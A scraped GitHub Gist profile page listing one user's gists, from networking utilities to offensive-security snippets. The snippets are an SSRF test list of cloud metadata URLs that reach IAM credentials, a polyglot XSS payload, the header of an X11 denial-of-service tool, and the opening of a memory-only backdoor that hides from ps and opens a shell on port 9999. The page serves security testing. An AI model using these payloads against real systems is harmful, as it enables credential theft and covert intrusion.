Skip to content

Instantly share code, notes, and snippets.

View epinna's full-sized avatar

Emilio epinna

View GitHub Profile
@epinna
epinna / iprange.py
Created November 29, 2019 12:49 — forked from reorx/iprange.py
#!/usr/bin/env python
# coding: utf-8
#
# Copyright (C) Michael Ihde 2004 <mike.ihde@randomwalking.com>
#
# Distributed under the Python License
#
# iprange is a useful module that creates iprange generators similar
# to python's xrange. This allows you to write statements such as
#
@epinna
epinna / namecheap_ddns.py
Created November 4, 2018 10:54 — forked from j796160836/namecheap_ddns.py
Python scripts for update DNS record for Namecheap (DDNS Services update script)
#!/usr/bin/env python
# encoding: utf-8
# Setup introductions:
# Open Namecheap website, select a domain (e.g. abc.com) then go to Advanced DNS
# (Accounts > Domain List > Advanced DNS)
# Insert an "A + Dynamic DNS Record", with hostname (e.g. my) and type whatnever IP address.
# Edit scripts for proper HOSTNAME (e.g. my.abc.com) and APIKEY (Dynamic DNS Password).
# Run and have fun!
@epinna
epinna / cloud_metadata.txt
Created July 27, 2018 18:33 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@epinna
epinna / Dockerfile
Last active January 17, 2019 10:24
Playground docker image
FROM ubuntu:latest
ARG LOCALE=en_US
ARG CHARMAP=UTF-8
ARG DEBIAN_FRONTEND=noninteractive
RUN dpkg --add-architecture i386
RUN apt-get update && apt-get --yes dist-upgrade && apt-get install --yes --no-install-recommends \
autoconf \
apache2 \
@epinna
epinna / logger.py
Created May 17, 2017 10:22
Python message format based on message logging level in Python 3
# Tested with Python 3.5.2
from config import LOGLEVEL
import logging
class SrvLogFormat(logging.Formatter):
err_fmt = "[E] %(msg)s"
warn_fmt = "[!] %(msg)s"
dbg_fmt = "[D] %(module)s: %(lineno)d: %(msg)s"
@epinna
epinna / XSh0k.c
Created January 31, 2017 15:05
Lame DoS by teenager me
/* 2/5/00 1.0
Xsh0k.c by n0rby -- NeURaL CoLLaPsE CrEw.
main code by AcidCrash -- NeURaL CoLLaPsE CrEw.
This dos simply creates a sequence of socket connections to Xwindow port
of a remote server. This cause a very disturbing effect to the XWindow user.
There are many and various effects: frequently Xwindow slows so much that
it's quite impossible to start new X programs; sometimes Xwindow don't
recognizes some keys or mouse input, and, more rarely it crash and
leave the user to the bash.

Keybase proof

I hereby claim:

  • I am epinna on github.
  • I am epinna (https://keybase.io/epinna) on keybase.
  • I have a public key whose fingerprint is 05F1 954C E1FB 4611 F742 8DF4 2041 EEA1 A192 B451

To claim this, I am signing this object:

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
@epinna
epinna / pypest.py
Last active September 4, 2023 02:13
Hackish one-liner memory-only backdoor agent which hides from ps
#!/usr/bin/env python
# This script prints a simple one-liner memory-only backdoor agent which hides from ps.
# It renames itself within the process list using a really hackish (AND POTENTIALLY DANGEROUS) /proc/self/mem rewrite
# and spawns a shell on port 9999. Just an experiment, there are simplest way to run unnoticed in the
# process list (see the technique used by EmPyre: https://github.com/adaptivethreat/EmPyre)
template = """
import sys,re,pty,os,socket
@epinna
epinna / colors.py
Created October 14, 2014 21:33
Retro ANSI colors
'''
Set ANSI Terminal Color and Attributes.
http://code.activestate.com/recipes/574451-handling-ansi-terminal/
'''
from sys import stdout
esc = '%s['%chr(27)
reset = '%s0m'%esc